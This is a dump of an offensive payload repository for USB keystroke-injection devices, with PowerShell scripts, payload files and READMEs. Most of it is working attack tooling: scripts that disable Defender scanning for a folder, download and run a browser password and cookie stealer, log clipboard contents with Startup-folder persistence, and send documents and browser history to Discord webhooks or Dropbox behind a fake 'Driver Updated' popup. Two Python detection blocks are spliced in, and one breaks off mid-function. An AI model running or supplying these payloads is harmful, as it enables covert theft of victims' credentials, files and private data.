Repository: atomiczsec/My-Payloads
Branch: main
Commit: 5f1da98a457a
Files: 224
Total size: 316.5 KB

Directory structure:
gitextract_2ly3q691/
├── Assets/
│   └── placeholder
├── BashBunny/
│   └── payloads/
│       ├── Bookmark-Hog/
│       │   ├── BBB.ps1
│       │   ├── README.md
│       │   ├── payload.txt
│       │   └── placeholder
│       ├── Browser-Grab/
│       │   ├── README.md
│       │   ├── b.ps1
│       │   └── payload.txt
│       ├── Copy-And-Waste/
│       │   ├── I.bat
│       │   ├── README.md
│       │   ├── c.ps1
│       │   ├── payload.txt
│       │   └── placeholder
│       ├── De-Bloater/
│       │   ├── README.md
│       │   └── payload.txt
│       ├── Doc-Hog/
│       │   ├── d.ps1
│       │   ├── payload.txt
│       │   └── readme.md
│       ├── History-Pig/
│       │   ├── HP.ps1
│       │   ├── README.md
│       │   └── payload.txt
│       ├── OVPN-Hog/
│       │   ├── o.ps1
│       │   ├── payload.txt
│       │   └── readme.md
│       ├── Powershell-History/
│       │   ├── PH.ps1
│       │   ├── README.md
│       │   └── payload.txt
│       ├── Printer-Recon/
│       │   ├── PR.ps1
│       │   ├── README.md
│       │   └── payload.txt
│       ├── Priv-Paths/
│       │   ├── README.md
│       │   └── payload.txt
│       ├── Proton-Hog/
│       │   ├── README.md
│       │   ├── payload.txt
│       │   └── s.ps1
│       ├── Pwn-Drive/
│       │   ├── README.md
│       │   ├── c.ps1
│       │   └── payload.txt
│       ├── RanFunWare/
│       │   ├── README.md
│       │   ├── payload.txt
│       │   └── r.ps1
│       ├── Screen-Shock/
│       │   ├── I.bat
│       │   ├── README.md
│       │   ├── c.ps1
│       │   ├── payload.txt
│       │   └── placeholder
│       ├── Spotify-Spy/
│       │   ├── README.md
│       │   ├── SS.ps1
│       │   └── payload.txt
│       ├── Water-UnMark/
│       │   ├── README.md
│       │   ├── payload.txt
│       │   └── placeholder
│       ├── cApS-Troll/
│       │   ├── README.md
│       │   ├── a.ps1
│       │   └── payload.txt
│       └── placeholder
├── FlipperZero/
│   └── payloads/
│       ├── Bookmark-Hog/
│       │   ├── BH.ps1
│       │   ├── README.md
│       │   └── payload.txt
│       ├── Browser-Devil/
│       │   └── Browser-Devil/
│       │       ├── README.md
│       │       ├── b.ps1
│       │       └── payload.txt
│       ├── Copy-And-Waste/
│       │   ├── I.bat
│       │   ├── README.md
│       │   ├── c.ps1
│       │   ├── payload.txt
│       │   └── placeholder
│       ├── De-Bloater/
│       │   ├── README.md
│       │   ├── payload.txt
│       │   └── placeholder
│       ├── Doc-Hog/
│       │   ├── d.ps1
│       │   ├── payload.txt
│       │   └── readme.md
│       ├── History-Pig/
│       │   ├── HP.ps1
│       │   ├── README.md
│       │   └── payload.txt
│       ├── OVPN-Hog/
│       │   ├── o.ps1
│       │   ├── payload.txt
│       │   └── readme.md
│       ├── Powershell-History/
│       │   ├── PH.ps1
│       │   ├── README.md
│       │   └── payload.txt
│       ├── Printer-Recon/
│       │   ├── PR.ps1
│       │   ├── README.md
│       │   └── payload.txt
│       ├── Priv-Paths/
│       │   ├── README.md
│       │   └── payload.txt
│       ├── Proton-Hog/
│       │   ├── README.md
│       │   ├── payload.txt
│       │   └── s.ps1
│       ├── Pwn-Drive/
│       │   ├── README.md
│       │   ├── c.ps1
│       │   └── payload.txt
│       ├── RanFunWare/
│       │   ├── README.md
│       │   ├── payload.txt
│       │   └── r.ps1
│       ├── Screen-Shock/
│       │   ├── I.bat
│       │   ├── README.md
│       │   ├── c.ps1
│       │   ├── payload.txt
│       │   └── placeholder
│       ├── Spotify-Spy/
│       │   ├── README.md
│       │   ├── SS.ps1
│       │   └── payload.txt
│       ├── Water-UnMark/
│       │   ├── README.md
│       │   ├── payload.txt
│       │   └── placeholder
│       └── cApS-Troll/
│           ├── README.md
│           ├── a.ps1
│           └── payload.txt
├── Functions/
│   ├── placeholder
│   └── tidal-log.ps1
├── OMG/
│   └── payloads/
│       ├── Bookmark-Hog/
│       │   ├── BH.ps1
│       │   ├── README.md
│       │   ├── payload.txt
│       │   └── placeholder
│       ├── Browser-Grab/
│       │   ├── README.md
│       │   ├── b.ps1
│       │   └── payload.txt
│       ├── Copy-And-Waste/
│       │   ├── I.bat
│       │   ├── README.md
│       │   ├── c.ps1
│       │   ├── payload.txt
│       │   └── placeholder
│       ├── De-Bloater/
│       │   ├── README.md
│       │   └── payload.txt
│       ├── Doc-Hog/
│       │   ├── d.ps1
│       │   ├── payload.txt
│       │   └── readme.md
│       ├── History-Pig/
│       │   ├── HP.ps1
│       │   ├── README.md
│       │   └── payload.txt
│       ├── OVPN-Hog/
│       │   ├── o.ps1
│       │   ├── payload.txt
│       │   └── readme.md
│       ├── Powershell-History/
│       │   ├── PH.ps1
│       │   ├── README.md
│       │   └── payload.txt
│       ├── Printer-Recon/
│       │   ├── PR.ps1
│       │   ├── README.md
│       │   └── payload.txt
│       ├── Priv-Paths/
│       │   ├── README.md
│       │   └── payload.txt
│       ├── Proton-Hog/
│       │   ├── README.md
│       │   ├── payload.txt
│       │   └── s.ps1
│       ├── Pwn-Drive/
│       │   ├── README.md
│       │   ├── c.ps1
│       │   └── payload.txt
│       ├── RanFunWare/
│       │   ├── README.md
│       │   ├── payload.txt
│       │   └── r.ps1
│       ├── Screen-Shock/
│       │   ├── I.bat
│       │   ├── README.md
│       │   ├── c.ps1
│       │   ├── payload.txt
│       │   └── placeholder
│       ├── Spotify-Spy/
│       │   ├── README.md
│       │   ├── SS.ps1
│       │   └── payload.txt
│       ├── Water-UnMark/
│       │   ├── README.md
│       │   ├── payload.txt
│       │   └── placeholder
│       ├── cApS-Troll/
│       │   ├── README.md
│       │   ├── a.ps1
│       │   └── payload.txt
│       └── placeholder
├── README.md
└── RubberDucky/
    └── payloads/
        ├── Bookmark-Hog/
        │   ├── BH.ps1
        │   ├── README.md
        │   └── payload.txt
        ├── Browser-Grab/
        │   ├── README.md
        │   ├── b.ps1
        │   └── payload.txt
        ├── Copy-And-Waste/
        │   ├── I.bat
        │   ├── README.md
        │   ├── c.ps1
        │   ├── payload.txt
        │   └── placeholder
        ├── De-Bloater/
        │   ├── README.md
        │   └── payload.txt
        ├── Doc-Hog/
        │   ├── d.ps1
        │   ├── payload.txt
        │   └── readme.md
        ├── History-Pig/
        │   ├── HP.ps1
        │   ├── README.md
        │   └── payload.txt
        ├── OVPN-Hog/
        │   ├── o.ps1
        │   ├── payload.txt
        │   └── readme.md
        ├── Picture-Hog/
        │   ├── p.ps1
        │   └── placeholder
        ├── Powershell-History/
        │   ├── PH.ps1
        │   ├── README.md
        │   └── payload.txt
        ├── Printer-Recon/
        │   ├── PR.ps1
        │   ├── README.md
        │   └── payload.txt
        ├── Priv-Paths/
        │   ├── README.md
        │   └── payload.txt
        ├── Proton-Hog/
        │   ├── README.md
        │   ├── payload.txt
        │   └── s.ps1
        ├── Pwn-Drive/
        │   ├── README.md
        │   ├── c.ps1
        │   └── payload.txt
        ├── RanFunWare/
        │   ├── README.md
        │   ├── payload.txt
        │   └── r.ps1
        ├── Screen-Shock/
        │   ├── I.bat
        │   ├── README.md
        │   ├── c.ps1
        │   ├── payload.txt
        │   └── placeholder
        ├── Spotify-Spy/
        │   ├── README.md
        │   ├── SS.ps1
        │   └── payload.txt
        ├── Water-UnMark/
        │   ├── README.md
        │   ├── payload.txt
        │   └── placeholder
        ├── cApS-Troll/
        │   ├── README.md
        │   ├── a.ps1
        │   └── payload.txt
        └── placeholder

================================================
FILE CONTENTS
================================================

================================================
FILE: Assets/placeholder
================================================


================================================
FILE: BashBunny/payloads/Bookmark-Hog/BBB.ps1
================================================
#Bookmark-Hog

# Get Drive Letter
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name

# Test if directory exists if not create directory in loot folder to store file
$TARGETDIR = "$bb\loot\Bookmark-Hog\$env:computername\Chromebm.txt"
$TARGETDIR2 = "$bb\loot\Bookmark-Hog\$env:computername\Edgebm.txt"
if(!(Test-Path -Path $TARGETDIR )){
    mkdir $TARGETDIR
}

# See if file is a thing
Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf

#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) {
    try {
        Write-Host "The chrome bookmark file has not been found. "
    }
    catch {
        throw $_.Exception.Message
    }
}
# Copy Chrome Bookmarks to Bash Bunny
else {
    Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$TARGETDIR"
}

# See if file is a thing
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2"

#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) {
    try {
        Write-Host "The edge bookmark file has not been found. "
    }
    catch {
        throw $_.Exception.Message
    }
}
# Copy Chrome Bookmarks to Bash Bunny
else {
    Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2"
}

================================================
FILE: BashBunny/payloads/Bookmark-Hog/README.md
================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Bookmark-Hog

A payload to exfiltrate bookmarks of the 2 most popular browsers

## Description

This payload will enumerate through the browser directories, looking for the file that stores the bookmark history

These files will be saved to the bash bunny in the loot directory

## Getting Started

### Dependencies

* Windows 10, 11

### Executing program

* Plug in your device
* Let the magic happen

## Contributing

All contributors' names will be listed here

atomiczsec

I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================
FILE: BashBunny/payloads/Bookmark-Hog/payload.txt
================================================
# Title: Bookmark-Hog
# Description: This payload is meant to exfiltrate bookmarks to the bash bunny.
# Author: atomiczsec
# Version: 1.0
# Category: Exfiltration
# Attackmodes: HID, Storage
# Target: Windows 10, 11

LED SETUP

GET SWITCH_POSITION

ATTACKMODE HID STORAGE

LED STAGE1

QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100

LED STAGE2

QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\BBB.ps1')"
QUACK ENTER

================================================
FILE: BashBunny/payloads/Bookmark-Hog/placeholder
================================================


================================================
FILE: BashBunny/payloads/Browser-Grab/README.md
================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Browser-Grab

A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers

## Description

This payload will exclude the C: drive on the device so Windows Defender doesn't flag the exe

This payload will then download an exe designed to exfiltrate bookmarks, passwords, history and cookies of most popular browsers

Finally, discord will be used to exfiltrate the files to cloud storage

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Admin privileges on the Device you are targeting
* Windows 10, 11

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here

atomiczsec

I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================
FILE: BashBunny/payloads/Browser-Grab/b.ps1
================================================
function Upload-Discord {

    [CmdletBinding()]
    param (
        [parameter(Position=0,Mandatory=$False)]
        [string]$file,
        [parameter(Position=1,Mandatory=$False)]
        [string]$text
    )

    $hookurl = 'YOUR-DISCORD-WEBHOOK'

    $Body = @{
        'username' = $env:username
        'content' = $text
    }

    if (-not ([string]::IsNullOrEmpty($text))){
        Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};

    if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
}

# Add $env:tmp to exclusions so Windows Defender doesn't flag the exe we will download
Add-MpPreference -ExclusionPath $env:tmp

# Download the exe and save it to temp directory
iwr "https://github.com/atomiczsec/My-Payloads/blob/main/Assets/browser.exe?raw=true" -outfile "$env:tmp\browser.exe"

# Execute the Browser Stealer
cd $env:tmp;Start-Process -FilePath "$env:tmp\browser.exe" -WindowStyle h -Wait

# Exfiltrate the loot to discord
Compress-Archive -Path "$env:tmp\results" -DestinationPath $env:tmp\browserdata.zip
Upload-Discord -file "$env:tmp\browserdata.zip"

================================================
FILE: BashBunny/payloads/Browser-Grab/payload.txt
================================================
REM Title: Browser-Grab
REM Author: atomiczsec
REM Description: A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers
REM Target: Windows 10

Q DELAY 2000
Q GUI r
Q DELAY 1000
Q STRING powershell start-process powershell -verb runas
Q ENTER
Q DELAY 1000
Q ALT y
Q DELAY 1000
Q STRING iwr https:// < Your Shared link for the intended file> ?dl=1 | iex
Q ENTER

REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly

================================================
FILE: BashBunny/payloads/Copy-And-Waste/I.bat
================================================
@echo off
powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
pause

================================================
FILE: BashBunny/payloads/Copy-And-Waste/README.md
================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Copy-And-Waste

A payload to exfiltrate clipboard contents

## Description

This payload uses iwr to download 2 files

* I.bat
* c.ps1

**I.bat** is downloaded to the startup folder to maintain persistence and execute c.ps1 on reboot/startup

**c.ps1** will sit in AppData\Roaming folder, waiting for a Ctrl + C or Ctrl + X click

The contents will then be sent to the discord webhook for viewing pleasure

For killing the script press both Ctrl buttons at the same time [It will resume at reboot]

## Getting Started

### Dependencies

* Pastebin or other file sharing service, Discord webhook or other webhook service
* Windows 10, 11
* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks

### Executing program

* Plug in your device
* Device will download both files and place them in proper directories to then run the script

```
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
```

## Contributing

All contributors' names will be listed here:

[atomiczsec](https://github.com/atomiczsec) & [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

## Version History

* 0.1
    * Initial Release

## Contact

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
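A defender's view of the command lines in these READMEs, as an added example that is not part of the repository: the Python below matches the abbreviated `powershell -w h ... -ep Bypass ... iwr ... iex` launch, the `Add-MpPreference -ExclusionPath` call from `b.ps1`, references to the Startup folder, and the `RunMRU` deletion that `PR.ps1` performs. The events are constructed samples that borrow Sysmon process-creation field names (`Image`, `ParentImage`, `CommandLine`); the rule names and `example.invalid` URLs are assumptions.

```python
import re


def prefix_re(word: str, min_len: int = 1) -> str:
    """Regex for any prefix of `word` at least `min_len` long (longest first).

    powershell.exe accepts shortened parameter names, so "-w h" and
    "-WindowStyle Hidden" have to be treated as the same switch.
    """
    prefixes = [word[:i] for i in range(len(word), min_len - 1, -1)]
    return "(?:" + "|".join(prefixes) + ")"


I = re.IGNORECASE
HIDDEN = re.compile(
    r"(?<!\S)-" + prefix_re("windowstyle") + r"\s+" + prefix_re("hidden") + r"(?!\w)", I)
BYPASS = re.compile(
    r"(?<!\S)-(?:ep|" + prefix_re("executionpolicy", 2) + r")\s+bypass(?!\w)", I)
DOWNLOAD = re.compile(
    r"(?<![\w-])(?:iwr|irm|invoke-webrequest|invoke-restmethod)(?![\w-])", I)
EXECUTE = re.compile(r"(?<![\w-])(?:iex|invoke-expression)(?![\w-])", I)
DEFENDER_EXCLUSION = re.compile(
    r"\b(?:add|set)-mppreference\b.*-exclusion(?:path|process|extension)\b", I)
STARTUP_FOLDER = re.compile(r"\\start menu\\programs\\startup\\", I)
RUNMRU_DELETE = re.compile(r"\bdelete\b.*\\explorer\\runmru\b", I)


def detect(event: dict) -> list:
    """Return the names of the rules (hypothetical names) an event matches."""
    cmd = event.get("CommandLine", "")
    hits = []
    # -ExecutionPolicy Bypass alone is common in admin tooling; require the
    # hidden window and a web download as well before raising anything.
    if HIDDEN.search(cmd) and BYPASS.search(cmd) and DOWNLOAD.search(cmd):
        hits.append("hidden_bypass_download")
        if EXECUTE.search(cmd):
            hits.append("in_memory_exec")
    if DEFENDER_EXCLUSION.search(cmd):
        hits.append("defender_exclusion")
    if STARTUP_FOLDER.search(cmd):
        hits.append("startup_folder_reference")
    if RUNMRU_DELETE.search(cmd):
        hits.append("runmru_cleared")
    # Commands typed into the Run box are spawned by explorer.exe.
    if hits and event.get("ParentImage", "").lower().endswith("\\explorer.exe"):
        hits.append("parent_explorer")
    return hits


def triage(events: list) -> list:
    """Return (index, hits) for every event that matched at least one rule."""
    out = []
    for i, event in enumerate(events):
        hits = detect(event)
        if hits:
            out.append((i, hits))
    return out


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events; hosts, users and paths are placeholders.
SAMPLE_EVENTS = [
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w h -NoP -NonI -ep Bypass "
                    "$pl = iwr https://files.example.invalid/x?dl=1; iex $pl"},
    {"Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command '
                    '"Invoke-WebRequest https://files.example.invalid/a.ps1 | Invoke-Expression"'},
    {"Image": PS, "ParentImage": PS,
     "CommandLine": r"powershell.exe -Command Add-MpPreference "
                    r"-ExclusionPath C:\Users\u\AppData\Local\Temp"},
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell -w h -NoP -NonI -Ep Bypass "echo (iwr paste.example.invalid/raw/a)'
                    r'.content > "C:\Users\u\AppData\Roaming\Microsoft\Windows'
                    r'\Start Menu\Programs\Startup\l.bat""'},
    {"Image": PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"Image": r"C:\Windows\System32\reg.exe", "ParentImage": PS,
     "CommandLine": r"reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows"
                    r"\CurrentVersion\Explorer\RunMRU /va /f"},
]

if __name__ == "__main__":
    for index, hits in triage(SAMPLE_EVENTS):
        print(index, hits)
```

The fifth sample is a scheduled admin script that uses `-ExecutionPolicy Bypass` on its own and is deliberately left unflagged.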

================================================
FILE: BashBunny/payloads/Copy-And-Waste/c.ps1
================================================
Add-Type -AssemblyName WindowsBase
Add-Type -AssemblyName PresentationCore

function dischat {

    [CmdletBinding()]
    param (
        [Parameter (Position=0,Mandatory = $True)]
        [string]$con
    )

    $hookUrl = 'YOUR DISCORD WEBHOOK'

    $Body = @{
        'username' = $env:username
        'content' = $con
    }

    Invoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body

}

dischat (get-clipboard)

while (1){
    $Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl')
    $Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl)
    $cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c)
    $xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x)

    if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)}
    elseif ($Rctrl -and $Lctrl) {dischat "---------connection lost----------";exit}
    else {continue}
}

================================================
FILE: BashBunny/payloads/Copy-And-Waste/payload.txt
================================================
REM Title: Copy-And-Waste
REM Author: atomiczsec & I am Jakoby
REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook
REM Target: Windows 10, 11

DELAY 2000
GUI
DELAY
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
ENTER

REM Remember to replace the link with your pastebin shared link for the intended files to download
REM Also remember to put in your discord webhook in c.ps1
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH

================================================
FILE: BashBunny/payloads/Copy-And-Waste/placeholder
================================================


================================================
FILE: BashBunny/payloads/De-Bloater/README.md
================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# De-Bloater

A payload to quickly get "Windows10Debloater"

## Description

This script will download "Windows10Debloater" - Script/Utility/Application to debloat Windows 10, to remove Windows pre-installed unnecessary applications, stop some telemetry functions, stop Cortana from being used as your Search Index, disable unnecessary scheduled tasks, and more...

## Getting Started

### Dependencies

* Windows 10

### Executing program

* Plug in your device

```
iwr -useb https://git.io/debloat|iex
```

## Contributing

All contributors' names will be listed here:

[atomiczsec](https://github.com/atomiczsec)

[Sycnex](https://github.com/Sycnex/Windows10Debloater)

[I am Jakoby](https://github.com/I-Am-Jakoby/Powershell-to-Ducky-Converter)

## Version History

* 0.1
    * Initial Release

## Contact

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
* [Sycnex - Creator Of The Tool](https://github.com/Sycnex/Windows10Debloater)

================================================
FILE: BashBunny/payloads/Doc-Hog/d.ps1
================================================
function Doc-Hog {

    [CmdletBinding()]
    param (
        [parameter(Position=0,Mandatory=$False)]
        [string]$file,
        [parameter(Position=1,Mandatory=$False)]
        [string]$text
    )

    $hookurl = 'DISCORD-WEBHOOK'

    $Body = @{
        'username' = $env:username
        'content' = $text
    }

    if (-not ([string]::IsNullOrEmpty($text))) {
        Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)
    }

    if (-not ([string]::IsNullOrEmpty($file))) {
        curl.exe -F "file1=@$file" $hookurl
    }
}

$Files = Get-ChildItem -Path "$env:HOMEPATH" -Include "*.docx","*.doc","*.pptx","*.xlsx","*.pdf","*.jpeg","*.png","*.jpg","*.csv","*.txt" -Recurse

$types = @{
    "*.docx" = "Word";
    "*.doc" = "Word";
    "*.pptx" = "PowerPoint";
    "*.xlsx" = "Excel";
    "*.pdf" = "PDF";
    "*.jpeg" = "JPEG";
    "*.png" = "PNG";
    "*.jpg" = "JPEG";
    "*.csv" = "CSV";
    "*.txt" = "Text";
}

foreach ($type in $types.Keys) {
    $filteredFiles = $Files | Where-Object {$_.Name -like $type}
    if ($filteredFiles) {
        $zipFile = "$env:TEMP\$($types[$type]).zip"
        $filteredFiles | Compress-Archive -DestinationPath $zipFile
        Doc-Hog -file $zipFile -text "Uploading $($types[$type]) files"
    }
}

================================================
FILE: BashBunny/payloads/Doc-Hog/payload.txt
================================================
REM Title: Doc-Hog
REM Author: atomiczsec
REM Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.

DEFINE URL http://new-url.com/powershell.ps1

REM Target: Windows 10

QUACK DELAY 2000
QUACK GUI r
QUACK DELAY 500
QUACK STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl
QUACK ENTER

REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1

================================================
FILE: BashBunny/payloads/Doc-Hog/readme.md
================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Doc-Hog

A payload to exfiltrate all files like, PNG, DOCX, PDF, TXT, Excel, JPEG, and CSV

## Description

This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10, 11

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here

atomiczsec

I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================
FILE: BashBunny/payloads/History-Pig/HP.ps1
================================================
#History-Pig

# See if file is a thing
Test-Path -Path "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" -PathType Leaf

#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -PathType Leaf)) {
    try {
        Write-Host "The Chrome History file has not been found. "
    }
    catch {
        throw $_.Exception.Message
    }
}
# Copy Chrome History to Temp Directory to get sent to Dropbox
else {
    $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_history"
    Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -Destination "$env:tmp/$F1"
}

# See if file is a thing
Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf

#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf)) {
    try {
        Write-Host "The Edge History file has not been found. "
    }
    catch {
        throw $_.Exception.Message
    }
}
# Copy Edge History to Temp Directory to get sent to Dropbox
else {
    $F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_history"
    Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -Destination "$env:tmp/$F2"
}

function DropBox-Upload {

    [CmdletBinding()]
    param (
        [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
        [Alias("f")]
        [string]$SourceFilePath
    )
    $DropBoxAccessToken = "ADD-YOUR-DROPBOX-TOKEN-HERE" # Replace with your DropBox Access Token
    $outputFile = Split-Path $SourceFilePath -leaf
    $TargetFilePath="/$outputFile"
    $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
    $authorization = "Bearer " + $DropBoxAccessToken
    $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
    $headers.Add("Authorization", $authorization)
    $headers.Add("Dropbox-API-Arg", $arg)
    $headers.Add("Content-Type", 'application/octet-stream')
    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}

DropBox-Upload -f "$env:tmp/$F1"
DropBox-Upload -f "$env:tmp/$F2"

$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)

================================================
FILE: BashBunny/payloads/History-Pig/README.md
================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# History-Pig

A payload to exfiltrate the history of the 2 most popular browsers

## Description

This payload will enumerate through the browser directories, looking for the file that stores the history

These files will be saved to the temp directory

Finally dropbox will be used to exfiltrate the files to cloud storage

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10, 11

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here

atomiczsec

I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
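On the network side, the Dropbox and Discord uploads these scripts perform can be hunted in web-proxy logs. The Python below is an added example, not part of the repository; it assumes a TLS-inspecting proxy that records full URLs and User-Agent strings, and the log layout, client addresses and sample lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Upload endpoints used by the scripts on this page: the Dropbox content API
# path appears in HP.ps1, and Discord webhooks live under /api/webhooks/.
UPLOAD_ENDPOINTS = {
    "content.dropboxapi.com": re.compile(r"^/2/files/upload$"),
    "discord.com": re.compile(r"^/api/(?:v\d+/)?webhooks/"),
    "discordapp.com": re.compile(r"^/api/(?:v\d+/)?webhooks/"),
}

# Invoke-RestMethod / Invoke-WebRequest and curl.exe identify themselves in
# the default User-Agent ("...WindowsPowerShell/5.1...", "curl/8.x").
SCRIPT_AGENT = re.compile(r"PowerShell/|^curl/", re.IGNORECASE)

# Assumed log layout: timestamp client method url status bytes_out "user-agent"
LOG_LINE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) '
    r'(?P<status>\d{3}) (?P<bytes_out>\d+) "(?P<ua>[^"]*)"$')


def parse(line: str):
    """Parse one proxy log line into a dict, or return None if malformed."""
    m = LOG_LINE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["bytes_out"] = int(rec["bytes_out"])
    return rec


def is_scripted_upload(rec: dict) -> bool:
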